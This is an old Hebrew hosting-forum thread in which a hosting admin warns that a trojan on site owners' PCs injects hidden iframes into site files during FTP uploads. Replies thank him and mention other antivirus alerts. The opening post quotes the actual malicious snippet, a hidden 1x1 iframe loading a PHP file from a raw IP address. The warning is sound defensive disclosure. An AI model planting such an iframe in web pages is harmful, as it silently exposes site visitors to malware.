התראת וירוסים חמורה באתרים - הוסטס

**דניאל** · 12-12-07, 11:01

שלום לכל המשתמשים,

התראה זו מתייחסת לגולשים ולבעלי אתרים כאחד.

לאחרונה התקבלו אצלי (sPD Hosting) מספר פניות בנוגע לוירוס ש"קופץ" כאשר פותחים את האתר,

במידה ואתם נתקלים באחד כזה (בהנחה כמובן שמותקן אצלכם אנטי-וירוס ומתעדכן בקביעות) חשוב לציין שלא מדובר בוירוס כלשהוא ע"ג השרת עליו מתאכסן השרת או בפעולה מתוכננת מצד בעל האתר.

מדובר בסוס טרויאני המושתל במחשבו של בעל האתר,
כאשר בעל האתר משתמש בFTP הוירוס אוטומטית מוסף לקוד המקור של האתר,
לרוב בעמודים בשמות: index.php, default.asp או קבצים מרכזיים אחרים.

הוירוס מצורף לאתר בתור IFrame,
לרוב מיד לאחר תג הbody.

דוגמא:

קוד:

<iframe src='http://62.176.16.19/tt.php' width='1' height='1' style='visibility: hidden;'></iframe>

(לא להכנס לקישור, הוא אכן וירוס)

למידע על הוירוסים:
Trojan-Clicker.HTML.IFrame.g
Trojan-Clicker.HTML.IFrame.fq

אם יש שמות נוספים לוירוסים,
אשמח אם משתמשים נוספים יוסיפו מידע, יעודכן כאן בפוסט הראשי.

האנטי-וירוס Kaspersky 7 מזהה אותו מצויין,
לגבי תוכנות אנטי-וירוס נוספות, שום מושג.

**Tom_l** · 12-12-07, 11:04

תודה רבה לך על האזהרה!

Dodem · 12-12-07, 11:43

תודה רבה. ויש אפשרות להוציא אותו מהקוד מקור, ושלא יחזור לשם?

satan · 12-12-07, 11:50

בעע בדיוק קפץ לי הAVG עם ההודעה:
קובץ מסוג PDF (של ADOBE מסמכים)
Downloader.Zlob.LI

מוכר לכם?

זו דרך מאוד חכמה מעניין מאוד איך הם עורכים את הקובץ ועושים את כל זה.

~~d-forum~~ · 12-12-07, 12:30

לפני שניה הנורטון ביקש לעשות בדיקה אם הרשת וזה נתן לו איקס
בדיוק שנכנסתי!
עריכה:
נורטון 2008 סיקרוטי משהו..

Derey22 · 12-12-07, 12:30

תודה על העדכון.
ולDodem נראה לי שכן,אבל זה יחזור.

**דניאל** · 12-12-07, 12:51

אפשר למחוק אותו מהקוד,

אבל אם הוירוס עדין קיים במחשב של בעל האתר (יותר נכון, מי שמעלה אותו לFTP),
הוירוס יחזור.

Cream · 12-12-07, 12:57

זה ווירוס דיי ישן...עוד זוכר לפני כמה חודשים מישהו פתח פה אשכול על זה...פעם גם ב siz.co.il היה את זה... ובעוד כמה אתרים של משתמשים פה בפורום... בכל מקרה תודה על העדכון

SlideR · 12-12-07, 13:12

תודה רבה על האזהרה

ompc · 12-12-07, 13:19

תודה על האזהרה...

12-12-07, 11:01	# 1
דניאל מנהל ראשי מיני פרופיל תאריך הצטרפות: Oct 2005 מיקום: ראשון לציון גיל: 40 הודעות: 6,503	התראת וירוסים חמורה באתרים שלום לכל המשתמשים, התראה זו מתייחסת לגולשים ולבעלי אתרים כאחד. לאחרונה התקבלו אצלי (sPD Hosting) מספר פניות בנוגע לוירוס ש"קופץ" כאשר פותחים את האתר, במידה ואתם נתקלים באחד כזה (בהנחה כמובן שמותקן אצלכם אנטי-וירוס ומתעדכן בקביעות) חשוב לציין שלא מדובר בוירוס כלשהוא ע"ג השרת עליו מתאכסן השרת או בפעולה מתוכננת מצד בעל האתר. מדובר בסוס טרויאני המושתל במחשבו של בעל האתר, כאשר בעל האתר משתמש בFTP הוירוס אוטומטית מוסף לקוד המקור של האתר, לרוב בעמודים בשמות: index.php, default.asp או קבצים מרכזיים אחרים. הוירוס מצורף לאתר בתור IFrame, לרוב מיד לאחר תג הbody. דוגמא: קוד: <iframe src='http://62.176.16.19/tt.php' width='1' height='1' style='visibility: hidden;'></iframe> (לא להכנס לקישור, הוא אכן וירוס) למידע על הוירוסים: Trojan-Clicker.HTML.IFrame.g Trojan-Clicker.HTML.IFrame.fq אם יש שמות נוספים לוירוסים, אשמח אם משתמשים נוספים יוסיפו מידע, יעודכן כאן בפוסט הראשי. האנטי-וירוס Kaspersky 7 מזהה אותו מצויין, לגבי תוכנות אנטי-וירוס נוספות, שום מושג. __________________ דניאל דוא"ל: dannyg@sPD.co.il sPD Hosting בע"מ \| אחסון אתרים \| בלוג אחסון אתרים טלפון להזמנות: 1-599-559977

12-12-07, 11:43	# 3
Dodem הוסטסניון מיני פרופיל תאריך הצטרפות: Oct 2005 הודעות: 2,180	תודה רבה. ויש אפשרות להוציא אותו מהקוד מקור, ושלא יחזור לשם? __________________ רותם דוא"ל: Rotema7 [at] gmail.com

12-12-07, 11:50	# 4
satan חבר וותיק מיני פרופיל תאריך הצטרפות: Oct 2005 גיל: 35 הודעות: 1,582	בעע בדיוק קפץ לי הAVG עם ההודעה: קובץ מסוג PDF (של ADOBE מסמכים) Downloader.Zlob.LI מוכר לכם? זו דרך מאוד חכמה מעניין מאוד איך הם עורכים את הקובץ ועושים את כל זה. __________________ פנוי לעבודה כמתכנת WEB - למידע נוסף: ליאור אמסלם. בניית אתרים באינטרנט - בלוג על בניית אתרים באינטרנט עם טיפים, מאמרים, מדריכי תכנות ועוד. משחקים אתר משחקים Last edited by satan; 12-12-07 at 11:52..

12-12-07, 12:51	# 7
דניאל מנהל ראשי מיני פרופיל תאריך הצטרפות: Oct 2005 מיקום: ראשון לציון גיל: 40 הודעות: 6,503	אפשר למחוק אותו מהקוד, אבל אם הוירוס עדין קיים במחשב של בעל האתר (יותר נכון, מי שמעלה אותו לFTP), הוירוס יחזור. __________________ דניאל דוא"ל: dannyg@sPD.co.il sPD Hosting בע"מ \| אחסון אתרים \| בלוג אחסון אתרים טלפון להזמנות: 1-599-559977

12-12-07, 12:57	# 8
Cream חבר מתקדם מיני פרופיל תאריך הצטרפות: Apr 2007 מיקום: ראשון לציון גיל: 39 הודעות: 577	זה ווירוס דיי ישן...עוד זוכר לפני כמה חודשים מישהו פתח פה אשכול על זה...פעם גם ב siz.co.il היה את זה... ובעוד כמה אתרים של משתמשים פה בפורום... בכל מקרה תודה על העדכון __________________ טראנס , פסיכודאלי , מסיבות , טבע


	ההרשמה לפורום נפתחה - אפשרות רישום לכל אימייל (דומיינים פרטיים, gmail, הוטמייל..)!

12-12-07, 11:04	# 2
Tom_l אחראי פורום מיני פרופיל תאריך הצטרפות: Dec 2006 הודעות: 443	תודה רבה לך על האזהרה!

12-12-07, 12:30	# 5
~~d-forum~~ מתאורר / יצא בחוץ מיני פרופיל תאריך הצטרפות: Sep 2007 הודעות: 489	לפני שניה הנורטון ביקש לעשות בדיקה אם הרשת וזה נתן לו איקס בדיוק שנכנסתי! עריכה: נורטון 2008 סיקרוטי משהו..

12-12-07, 12:30	# 6
Derey22 הוסטסניון מיני פרופיל תאריך הצטרפות: Oct 2005 מיקום: באר שבע גיל: 31 הודעות: 2,128	תודה על העדכון. ולDodem נראה לי שכן,אבל זה יחזור.

12-12-07, 13:12	# 9
SlideR חבר מתקדם מיני פרופיל תאריך הצטרפות: Sep 2006 הודעות: 366	תודה רבה על האזהרה

12-12-07, 13:19	# 10
ompc חבר חדש מיני פרופיל תאריך הצטרפות: Mar 2006 הודעות: 21	תודה על האזהרה...

חברים פעילים הצופים באשכול זה: 1 (0 חברים ו- 1 אורחים)

כלים לאשכול
הצגת גרסת הדפסה שלח דף זה באימייל
תצורת הצגה
עבור למצב קווי עבור לתצורה משולבת עבור לתצורת אשכולות